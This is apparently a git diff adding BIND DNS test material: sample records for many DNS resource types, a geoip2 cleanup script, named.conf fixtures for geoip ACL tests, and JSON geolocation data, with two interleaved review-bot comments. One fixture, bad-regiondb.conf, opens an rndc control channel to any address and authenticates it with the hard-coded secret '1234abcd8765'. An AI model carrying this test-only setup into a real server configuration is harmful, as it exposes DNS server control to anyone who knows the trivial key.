NSAP-PTR . + +; type 24 +;sig01 SIG NXT 1 3 ( 3600 20000102030405 +; 19961211100908 2143 foo.nil. +; MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45I +; kskceFGgiWCn/GxHhai6VAuHAoNUz4YoU1t +; VfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= ) + +; type 25 +;key01 KEY 512 ( 255 1 AQMFD5raczCJHViKtLYhWGz8hMY +; 9UGRuniJDBzC7w0aRyzWZriO6i2odGWWQVucZqKV +; sENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esg +; a60zyGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= ) + +; type 26 +px01 PX 65535 foo. bar. +px02 PX 65535 . . + +; type 27 +gpos01 GPOS -22.6882 116.8652 250.0 +gpos02 GPOS "" "" "" + +; type 28 +aaaa01 AAAA ::1 +aaaa02 AAAA fd92:7065:b8e:ffff::5 + +; type 29 +loc01 LOC 60 9 N 24 39 E 10 20 2000 20 +loc02 LOC 60 09 00.000 N 24 39 00.000 E 10.00m 20.00m ( + 2000.00m 20.00m ) + +; type 30 +;nxt01 NXT a.secure.nil. ( NS SOA MX RRSIG KEY LOC NXT ) +;nxt02 NXT . NXT NSAP-PTR +;nxt03 NXT . 1 +;nxt04 NXT . 127 + +; type 31 +eid01 EID 12 89 AB + +; type 32 +nimloc01 NIMLOC 12 89 AB + +; type 33 +srv01 SRV 0 0 0 . 
+srv02 SRV 65535 65535 65535 old-slow-box + +; type 34 +atma01 ATMA +61200000000 +atma02 ATMA +61.2.0000.0000 +atma03 ATMA 1234567890abcdef +atma04 ATMA f.e.d.c.b.a.0.9.8.7.6.5.4.3.2.1 + +; type 35 +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 blurgh blorf blllbb foo. +naptr02 NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. + +; type 36 +kx01 KX 10 kdc +kx02 KX 10 . + +; type 37 +cert01 CERT 65534 65535 254 ( + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45I + kskceFGgiWCn/GxHhai6VAuHAoNUz4YoU1t + VfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= ) +; type 38 +a601 A6 0 ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +a601 A6 64 ::ffff:ffff:ffff:ffff foo. +a601 A6 127 ::1 foo. +a601 A6 128 . + +; type 39 +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . + +; type 40 +sink01 SINK 1 0 0 +sink02 SINK 8 0 2 l4ik + +; type 41 +; OPT is a meta-type and should never occur in master files. + +; type 42 +apl01 APL !1:10.0.0.1/32 1:10.0.0.0/24 +apl02 APL + +; type 43 +ds01 DS 12892 5 2 26584835CA80C81C91999F31CFAF2A0E89D4FF1C8FAFD0DDB31A85C7 19277C13 +ds01 NS ns42 +ds02 DS 12892 5 1 7AA4A3F416C2F2391FB7AB0D434F762CD62D1390 +ds02 NS ns43 + +; type 44 +sshfp01 SSHFP 4 2 C76D8329954DA2835751E371544E963EFDA099080D6C58DD2BFD9A31 6E162C83 +sshfp02 SSHFP 1 2 BF29468C83AC58CCF8C85AB7B3BEB054ECF1E38512B8353AB36471FA 88961DCC + +; type 45 +ipseckey01 IPSECKEY 10 1 2 192.0.2.38 AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey02 IPSECKEY 10 0 2 . AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== +ipseckey03 IPSECKEY ( 10 1 2 + 192.0.2.3 + AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== ) +ipseckey04 IPSECKEY ( 10 3 2 + mygateway.example.com. + AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== ) + +ipseckey05 IPSECKEY ( 10 2 2 + 2001:0DB8:0:8002::2000:1 + AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== ) + +; type 46 +rrsig01 RRSIG NSEC 1 3 ( 3600 20000102030405 + 19961211100908 2143 foo.nil. 
+ MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45I + kskceFGgiWCn/GxHhai6VAuHAoNUz4YoU1t + VfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= ) + +; type 47 +nsec01 NSEC a.secure.nil. ( NS SOA MX RRSIG DNSKEY LOC NSEC ) +nsec02 NSEC . NSEC NSAP-PTR +nsec03 NSEC . TYPE1 +nsec04 NSEC . TYPE127 + +; type 48 +dnskey01 DNSKEY 512 ( 255 1 AQMFD5raczCJHViKtLYhWGz8hMY + 9UGRuniJDBzC7w0aRyzWZriO6i2odGWWQVucZqKV + sENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esg + a60zyGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= ) + +; type 49 +dhcid01 DHCID ( AAIBY2/AuCccgoJbsaxcQc9TUapptP69l + OjxfNuVAA2kjEA= ) +dhcid02 DHCID ( AAEBOSD+XR3Os/0LozeXVqcNc7FwCfQdW + L3b/NaiUDlW2No= ) +dhcid03 DHCID ( AAABxLmlskllE0MVjd57zHcWmEH3pCQ6V + ytcKD//7es/deY= ) + +; type 50 +8f1tmio9avcom2k0frp92lgcumak0cad NSEC3 1 0 10 D2CF0294C020CE6C 8FPNS2UCT7FBS643THP2B77PEQ77K6IU A NS SOA MX AAAA RRSIG DNSKEY NSEC3PARAM +kcd3juae64f9c5csl1kif1htaui7un0g NSEC3 1 0 10 D2CF0294C020CE6C KD5MN2M20340DGO0BL7NTSB8JP4BSC7E +mr5ukvsk1l37btu4q7b1dfevft4hkqdk NSEC3 1 0 10 D2CF0294C020CE6C MT38J6VG7S0SN5G17MCUF6IQIKFUAJ05 A AAAA RRSIG + +; type 51 +; @ NSEC3PARAM 1 0 1 868BCF7ED4108929 + +; type 52 +tlsa TLSA ( 1 1 2 92003ba34942dc74152e2f2c408d29ec + a5a520e7f2e06bb944f4dca346baf63c + 1b177615d466f6c4b71c216a50292bd5 + 8c9ebdd2f74e38fe51ffd48c43326cbc ) + +; type 53 +smimea SMIMEA ( 1 1 2 92003ba34942dc74152e2f2c408d29ec + a5a520e7f2e06bb944f4dca346baf63c + 1b177615d466f6c4b71c216a50292bd5 + 8c9ebdd2f74e38fe51ffd48c43326cbc ) + +; type 54 (unassigned) + +; type 55 +hip1 HIP ( 2 200100107B1A74DF365639CC39F1D578 + AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D ) + +hip2 HIP ( 2 200100107B1A74DF365639CC39F1D578 + AwEAAbdxyhNuSutc5EMzxTs9LBPCIkOFH8cIvM4p9+LrV4e19WzK00+CI6zBCQTdtWsuxKbWIy87UOoJTwkUs7lBu+Upr1gsNrut79ryra+bSRGQb1slImA8YVJyuIDsj7kwzG7jnERNqnWxZ48AWkskmdHaVDP4BcelrTI3rMXdXF5D + rvs.example.com. 
) + +; type 56 +ninfo01 NINFO "foo" +ninfo02 NINFO "foo" "bar" +ninfo03 NINFO foo +ninfo04 NINFO foo bar +ninfo05 NINFO "foo bar" +ninfo06 NINFO "foo\032bar" +ninfo07 NINFO foo\032bar +ninfo08 NINFO "foo\010bar" +ninfo09 NINFO foo\010bar +ninfo10 NINFO foo\ bar +ninfo11 NINFO "\"foo\"" +ninfo12 NINFO \"foo\" +ninfo13 NINFO "foo;" +ninfo14 NINFO "foo\;" +ninfo15 NINFO "bar\\;" + +; type 57 +rkey01 RKEY 0 ( 255 1 AQMFD5raczCJHViKtLYhWGz8hMY + 9UGRuniJDBzC7w0aRyzWZriO6i2odGWWQVucZqKV + sENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esg + a60zyGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= ) + +; type 58 +talink0 TALINK . talink1 +talink1 TALINK talink0 talink2 +talink2 TALINK talink2 . + +; type 59 +cds01 CDS 30795 1 1 ( + 310D27F4D82C1FC2400704EA9939FE6E1CEA + A3B9 ) + +; type 60 +cdnskey01 CDNSKEY 512 ( 255 1 AQMFD5raczCJHViKtLYhWGz8hMY + 9UGRuniJDBzC7w0aRyzWZriO6i2odGWWQVucZqKV + sENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esg + a60zyGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= ) + +; type 61 +openpgpkey OPENPGPKEY ( AQMFD5raczCJHViKtLYhWGz8hMY + 9UGRuniJDBzC7w0aRyzWZriO6i2odGWWQVucZqKV + sENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esg + a60zyGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= ) + +;type 62 +csync01 CSYNC 0 0 A NS AAAA +csync02 CSYNC 0 0 + +;type 63 +zonemd01 ZONEMD 2019020700 1 1 ( + C220B8A6ED5728A971902F7E3D4FD93A + DEEA88B0453C2E8E8C863D465AB06CF3 + 4EB95B266398C98B59124FA239CB7EEB + ) +zonemd02 ZONEMD 2019020700 1 2 ( + 08CFA1115C7B948C4163A901270395EA + 226A930CD2CBCF2FA9A5E6EB85F37C8A + 4E114D884E66F176EAB121CB02DB7D65 + 2E0CC4827E7A3204F166B47E5613FD27 + ) + +; type 64 -- 98 (unassigned) + +; type 99 +spf01 SPF "v=spf1 -all" +spf02 SPF "v=spf1" " -all" + +; type 100 (UINFO - not implemented by BIND - unknown record format only) +uinfo01 UINFO \# 1 01 + +; type 101 (UID - not implemented by BIND - unknown record format only) +uid01 UID \# 1 02 + +; type 102 (GID - not implemented by BIND - unknown record format only) +gid01 GID \# 1 03 + +; type 103 (UNSPEC - not implemented by BIND - unknown record format 
only) +unspec01 UNSPEC \# 1 04 + +; type 104 +nid NID 10 0014:4fff:ff20:ee64 + +; type 105 +l32 L32 10 1.2.3.4 + +; type 106 +l64 L64 10 0014:4fff:ff20:ee64 + +; type 107 +lp LP 10 example.net. + +; type 108 +eui48 EUI48 01-23-45-67-89-ab + +; type 109 +eui64 EUI64 01-23-45-67-89-ab-cd-ef + +; type 110 -- 248 (unassigned) + +; type 249 +; TKEY is a meta-type and should never occur in master files. +; The text representation is not specified in the draft. +; This example was written based on the bind9 RR parsing code. +;tkey01 TKEY 928321914 928321915 ( +; algorithm-name. ; algorithm +; 65535 ; mode +; 0 ; error +; 3 ; key size +; aaaa ; key data +; 3 ; other size +; bbbb ; other data +; ) +;; A TKEY with empty "other data" +;tkey02 TKEY 928321914 928321915 ( +; algorithm-name. ; algorithm +; 65535 ; mode +; 0 ; error +; 3 ; key size +; aaaa ; key data +; 0 ; other size +; ; other data +; ) + +; type 255 +; * is a meta-type and should never occur in master files. + +; type 256 +uri01 URI 10 20 "https://www.isc.org/" +uri02 URI 30 40 "https://www.isc.org/HolyCowThisSureIsAVeryLongURIRecordIDontEvenKnowWhatSomeoneWouldEverWantWithSuchAThingButTheSpecificationRequiresThatWesupportItSoHereWeGoTestingItLaLaLaLaLaLaLaSeriouslyThoughWhyWouldYouEvenConsiderUsingAURIThisLongItSeemsLikeASillyIdeaButEnhWhatAreYouGonnaDo/" +uri03 URI 30 40 "" + +; type 257 +caa01 CAA 0 issue "ca.example.net; policy=ev" +caa02 CAA 128 tbs "Unknown" +caa03 CAA 128 tbs "" + +; type 258 +avc AVC foo:bar + +; type 259 +doa01 DOA ( 1234567890 1234567890 1 "image/gif" + R0lGODlhKAAZAOMCAGZmZgBmmf///zOZzMz//5nM/zNmmWbM/5nMzMzMzACZ//// + /////////////////yH5BAEKAA8ALAAAAAAoABkAAATH8IFJK5U2a4337F5ogRkp + noCJrly7PrCKyh8c3HgAhzT35MDbbtO7/IJIHbGiOiaTxVTpSVWWLqNq1UVyapNS + 1wd3OAxug0LhnCubcVhsxysQnOt4ATpvvzHlFzl1AwODhWeFAgRpen5/UhheAYMF + dUB4SFcpGEGGdQeCAqBBLTuSk30EeXd9pEsAbKGxjHqDSE0Sp6ixN4N1BJmbc7lI + hmsBich1awPAjkY1SZR8bJWrz382SGqIBQQFQd4IsUTaX+ceuudPEQA7 ) +doa02 DOA 0 1 2 "" 
aHR0cHM6Ly93d3cuaXNjLm9yZy8= + +; type 260 +amtrelay01 AMTRELAY 0 0 0 +amtrelay02 AMTRELAY 0 1 0 +amtrelay03 AMTRELAY 0 0 1 0.0.0.0 +amtrelay04 AMTRELAY 0 0 2 :: +amtrelay05 AMTRELAY 0 0 3 example.net. +amtrelay06 AMTRELAY \# 2 0004 + +; type 261 -- 32767 (unassigned) + +; type 32768 +ta TA 30795 1 1 ( + 310D27F4D82C1FC2400704EA9939FE6E1CEA + A3B9 ) + +; type 32769 +dlv DLV 30795 1 1 ( + 310D27F4D82C1FC2400704EA9939FE6E1CEA + A3B9 ) + +; type 32770 -- 65279 (unassigned) + +; type 65280-65534 (private use) + +https0 HTTPS 0 example.net. +https1 HTTPS 1 . port=60 + +svcb0 SVCB 0 example.net. +svcb1 SVCB 1 . port=60 + +; keydata (internal type used for managed keys) +keydata TYPE65533 \# 0 +keydata TYPE65533 \# 6 010203040506 +keydata TYPE65533 \# 18 010203040506010203040506010203040506 + +; type 65535 (reserved) + +EOF diff --git a/bin/tests/system/geoip2/clean.sh b/bin/tests/system/geoip2/clean.sh new file mode 100644 index 0000000..46de65b --- /dev/null +++ b/bin/tests/system/geoip2/clean.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns2/named.conf +rm -f ns2/example*.db +rm -f dig.out.* rndc.out.* +rm -f ns?/named.run +rm -f ns?/named.memstats +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* ns*/*.mkeys* diff --git a/bin/tests/system/geoip2/conf/bad-areacode.conf b/bin/tests/system/geoip2/conf/bad-areacode.conf new file mode 100644 index 0000000..2ca9dd4 --- /dev/null +++ b/bin/tests/system/geoip2/conf/bad-areacode.conf 
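Review bot: In genzone.sh the `; type 7` section declares `mb01` and `mb02` with type `MG` rather than `MB`, so the generated zone contains no MB record at all while MG is covered twice (again under `; type 8`). If MB coverage is intended, the two lines should read `mb01 MB madname` and `mb02 MB .`. The `https0`/`https1` and `svcb0`/`svcb1` records near the end sit under the `; type 65280-65534 (private use)` heading without a `; type NN` comment of their own, unlike every other record type in the file; a heading for each would keep the listing consistent.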
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+controls { /* empty */ };
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port 5300;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ geoip-directory "data";
+ allow-query {
+ geoip area 831;
+ geoip areacode 831;
+ geoip metro 828;
+ geoip metrocode 828;
+ geoip tz "America/Los_Angeles";
+ geoip timezone "America/Los_Angeles";
+ geoip postal 95060;
+ geoip postalcode 95060;
+ };
+};
diff --git a/bin/tests/system/geoip2/conf/bad-dbname.conf b/bin/tests/system/geoip2/conf/bad-dbname.conf
new file mode 100644
index 0000000..9fc5238
--- /dev/null
+++ b/bin/tests/system/geoip2/conf/bad-dbname.conf
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+};
+
+view one {
+ match-clients { geoip db unknown asnum "WX"; };
+ zone "example" {
+ type primary;
+ file "example1.db";
+ };
+};
diff --git a/bin/tests/system/geoip2/conf/bad-netspeed.conf b/bin/tests/system/geoip2/conf/bad-netspeed.conf
new file mode 100644
index 0000000..133fd42
--- /dev/null
+++ b/bin/tests/system/geoip2/conf/bad-netspeed.conf
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+controls { /* empty */ };
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port 5300;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ geoip-directory "data";
+ allow-query {
+ geoip netspeed 100;
+ geoip metro 828;
+ geoip metrocode 828;
+ geoip tz "America/Los_Angeles";
+ geoip timezone "America/Los_Angeles";
+ geoip postal 95060;
+ geoip postalcode 95060;
+ };
+};
diff --git a/bin/tests/system/geoip2/conf/bad-regiondb.conf b/bin/tests/system/geoip2/conf/bad-regiondb.conf
new file mode 100644
index 0000000..aebdbed
--- /dev/null
+++ b/bin/tests/system/geoip2/conf/bad-regiondb.conf
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ geoip-directory "../data";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+view one {
+ match-clients { geoip db region region "California"; };
+ zone "example" {
+ type primary;
+ file "example1.db";
+ };
+};
diff --git a/bin/tests/system/geoip2/conf/bad-threeletter.conf b/bin/tests/system/geoip2/conf/bad-threeletter.conf
new file mode 100644
index 0000000..ec0a9df
--- /dev/null
+++ b/bin/tests/system/geoip2/conf/bad-threeletter.conf
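Review bot: In bad-regiondb.conf the `controls` statement accepts rndc connections from `any` and authenticates them with the literal secret `1234abcd8765` from the `key rndc_key` block, and nothing in the file marks these as harness-only values. A comment above the key, for example `// test-only rndc key for the 10.53.0.2 system-test address; never reuse in a deployed named.conf`, would keep the fixture from being copied as a template. The neighbouring fixtures visible in this commit (bad-dbname.conf, bad-threeletter.conf) carry no key or `inet` control channel, so it may also be worth confirming that this negative test needs them at all.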
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ geoip-directory "../data";
+};
+
+view one {
+ match-clients { geoip db country country AUS; };
+ zone "example" {
+ type primary;
+ file "example1.db";
+ };
+};
diff --git a/bin/tests/system/geoip2/conf/good-options.conf b/bin/tests/system/geoip2/conf/good-options.conf
new file mode 100644
index 0000000..02c5e5d
--- /dev/null
+++ b/bin/tests/system/geoip2/conf/good-options.conf
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+controls { /* empty */ };
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port 5300;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ geoip-directory "data";
+ allow-query {
+ geoip metro 828;
+ geoip metrocode 828;
+ geoip tz "America/Los_Angeles";
+ geoip timezone "America/Los_Angeles";
+ geoip postal 95060;
+ geoip postalcode 95060;
+ };
+};
diff --git a/bin/tests/system/geoip2/data/GeoIP2-City.json b/bin/tests/system/geoip2/data/GeoIP2-City.json
new file mode 100644
index 0000000..5490d42
--- /dev/null
+++ b/bin/tests/system/geoip2/data/GeoIP2-City.json
@@ -0,0 +1,506 @@ +[ + { + "::10.53.0.1/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Redwood City" + } + }, + "location" : { + "metro_code" : "807", + "time_zone" : "America/Los_Angeles" + }, + "postal" : { + "code" : "94063" + }, + "subdivisions" : [ + { + "iso_code" : "CA", + "names" : { + "en" : "California" + } + } + ] + } + }, + { + "::10.53.0.2/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Santa Cruz" + } + }, + "location" : { + "metro_code" : "828", + "time_zone" : "America/Los_Angeles" + }, + "postal" : { + "code" : "95060" + }, + "subdivisions" : [ + { + "iso_code" : "CA", + "names" : { + "en" : "California" + } + } + ] + } + }, + { + "::10.53.0.3/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Oklahoma City" + } + }, + "location" : { + "metro_code" : "650", + "time_zone" : "America/Chicago" + }, + "postal" : { + "code" : "73120" + }, + "subdivisions" : [ + { + "iso_code" : "OK", + "names" : { + "en" : "Oklahoma" + } + } + ] + } + }, + { + "::10.53.0.4/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Ashland" + } + }, + "location" : { + "metro_code" : "556", + "time_zone" : "America/New_York" + }, + "postal" : { + "code" : "23005" + }, + "subdivisions" : [ + { + "iso_code" : "VA", + "names" : { + "en" : "Virginia" + } + } + ] + } + }, + { + "::10.53.0.5/128" : { + "continent" : { + "code" : "NA", + 
"names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Atlanta" + } + }, + "location" : { + "metro_code" : "524", + "time_zone" : "America/New_York" + }, + "postal" : { + "code" : "30345" + }, + "subdivisions" : [ + { + "iso_code" : "GA", + "names" : { + "en" : "Georgia" + } + } + ] + } + }, + { + "::10.53.0.6/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Morrison" + } + }, + "location" : { + "metro_code" : "751", + "time_zone" : "America/Denver" + }, + "postal" : { + "code" : "80465" + }, + "subdivisions" : [ + { + "iso_code" : "CO", + "names" : { + "en" : "Colorado" + } + } + ] + } + }, + { + "::10.53.0.7/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Ketchikan" + } + }, + "location" : { + "metro_code" : "747", + "time_zone" : "America/Anchorage" + }, + "postal" : { + "code" : "99901" + }, + "subdivisions" : [ + { + "iso_code" : "AK", + "names" : { + "en" : "Alaska" + } + } + ] + } + }, + { + "fd92:7065:b8e:ffff::1/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Redwood City" + } + }, + "location" : { + "metro_code" : "807", + "time_zone" : "America/Los_Angeles" + }, + "postal" : { + "code" : "94063" + }, + "subdivisions" : [ + { + "iso_code" : "CA", + "names" : { + "en" : "California" + } + } + ] + } + }, + { + "fd92:7065:b8e:ffff::2/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", 
+ "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Santa Cruz" + } + }, + "location" : { + "metro_code" : "828", + "time_zone" : "America/Los_Angeles" + }, + "postal" : { + "code" : "95060" + }, + "subdivisions" : [ + { + "iso_code" : "CA", + "names" : { + "en" : "California" + } + } + ] + } + }, + { + "fd92:7065:b8e:ffff::3/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Oklahoma City" + } + }, + "location" : { + "metro_code" : "650", + "time_zone" : "America/Chicago" + }, + "postal" : { + "code" : "73120" + }, + "subdivisions" : [ + { + "iso_code" : "OK", + "names" : { + "en" : "Oklahoma" + } + } + ] + } + }, + { + "fd92:7065:b8e:ffff::4/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Ashland" + } + }, + "location" : { + "metro_code" : "556", + "time_zone" : "America/New_York" + }, + "postal" : { + "code" : "23005" + }, + "subdivisions" : [ + { + "iso_code" : "VA", + "names" : { + "en" : "Virginia" + } + } + ] + } + }, + { + "fd92:7065:b8e:ffff::5/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Atlanta" + } + }, + "location" : { + "metro_code" : "524", + "time_zone" : "America/New_York" + }, + "postal" : { + "code" : "30345" + }, + "subdivisions" : [ + { + "iso_code" : "GA", + "names" : { + "en" : "Georgia" + } + } + ] + } + }, + { + "fd92:7065:b8e:ffff::6/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : 
{ + "names" : { + "en" : "Morrison" + } + }, + "location" : { + "metro_code" : "751", + "time_zone" : "America/Denver" + }, + "postal" : { + "code" : "80465" + }, + "subdivisions" : [ + { + "iso_code" : "CO", + "names" : { + "en" : "Colorado" + } + } + ] + } + }, + { + "fd92:7065:b8e:ffff::7/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Ketchikan" + } + }, + "location" : { + "metro_code" : "747", + "time_zone" : "America/Anchorage" + }, + "postal" : { + "code" : "99901" + }, + "subdivisions" : [ + { + "iso_code" : "AK", + "names" : { + "en" : "Alaska" + } + } + ] + } + } +] diff --git a/bin/tests/system/geoip2/data/GeoIP2-City.mmdb b/bin/tests/system/geoip2/data/GeoIP2-City.mmdb Binary files differnew file mode 100644 index 0000000..79c5314 --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoIP2-City.mmdb diff --git a/bin/tests/system/geoip2/data/GeoIP2-Country.json b/bin/tests/system/geoip2/data/GeoIP2-Country.json new file mode 100644 index 0000000..83a8ca8 --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoIP2-Country.json 
